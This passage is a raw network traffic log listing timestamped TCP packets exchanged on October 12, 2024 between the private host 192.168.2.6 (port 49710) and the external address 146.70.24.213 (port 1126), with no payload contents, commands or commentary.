Oct 12, 2024 20:30:06.902802944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902807951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902817965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.902858973 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.902889013 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.903798103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.903986931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904010057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904026031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904040098 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904055119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904056072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.904068947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904087067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904093027 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.904100895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904115915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904129982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904138088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.904146910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904160023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904170990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.904175997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904191971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.904196978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.904216051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.905059099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905081034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905124903 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.905143976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905191898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.905237913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905253887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905270100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905283928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905289888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.905297995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.905324936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.943674088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943702936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943717957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943733931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943744898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.943804979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.943842888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943859100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943875074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943885088 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.943887949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.943927050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.988065958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988125086 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.988193989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988209009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988224030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988239050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988253117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988267899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988281965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.988286972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.988328934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.991398096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.991413116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.991427898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.991451025 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.991507053 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.991539955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.991564989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.991580009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.991595030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.991621017 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.991657019 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992420912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992436886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992450953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992475986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992477894 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992491007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992506027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992515087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992522001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992568970 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992588997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992604017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992619038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992630005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992634058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992649078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992662907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992664099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992680073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992706060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992708921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992734909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992799997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992813110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992826939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992842913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992862940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992882967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992897987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992913008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992928028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.992938042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.992975950 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.993767977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.993793011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.993805885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.993845940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.993884087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.993925095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.993937016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994039059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994054079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994067907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994088888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994121075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994149923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994165897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994179964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994194031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994214058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994219065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994234085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994249105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994250059 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994261026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994276047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994277954 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994292021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994306087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994319916 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994321108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994335890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994343042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994359016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994364023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994374990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994390965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994396925 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994414091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994431019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994434118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994446039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994462013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994477034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994477987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994493008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994510889 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994529963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994541883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994550943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994565964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994580030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994586945 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994595051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994617939 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994618893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994633913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994658947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.994972944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.994997978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995012045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995016098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.995033979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995049000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995071888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.995074034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995089054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995090961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.995102882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995120049 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.995217085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995242119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995258093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995265961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.995271921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995289087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995296955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.995305061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995328903 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.995393991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.995445013 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.996531010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996548891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996563911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996577978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996597052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.996603012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996617079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996620893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.996632099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996646881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996656895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.996663094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996679068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996684074 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.996694088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996709108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996723890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996735096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.996742010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.996768951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.996787071 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.997719049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997797966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997818947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997833967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997848988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997864008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.997864008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997879982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997894049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.997895002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.997915983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.997939110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.036118984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036133051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036180019 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.036209106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036223888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036238909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036262035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036267042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.036278009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036293983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.036317110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.036350965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.080895901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.080929995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.080964088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.080996037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.081011057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.081028938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.081053972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.081059933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.081098080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.081125975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.081149101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.081187963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.084135056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084187031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084214926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084254980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.084264040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084296942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084327936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084328890 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.084361076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084382057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.084393024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.084435940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.084918022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085062981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085092068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085115910 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085124969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085159063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085191011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085206032 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085236073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085248947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085299015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085331917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085345030 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085364103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085397005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085443020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085685015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085717916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085762024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085766077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085798025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085823059 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085832119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085864067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085896969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085906982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085930109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085943937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.085962057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.085995913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086025000 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.086030960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086081982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.086313009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086364031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086391926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086437941 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.086442947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086492062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086504936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.086525917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086560011 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086590052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.086611032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086642981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086677074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086688042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.086709023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086733103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.086930037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086961985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.086994886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087009907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087044001 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087050915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087100029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087131977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087152958 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087165117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087197065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087229013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087249994 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087275982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087279081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087311983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087343931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087376118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087400913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087423086 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087425947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087459087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087491035 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:07.087517023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:07.087522984 CEST	1126	49710	146.70.24.213	192.168.2.6
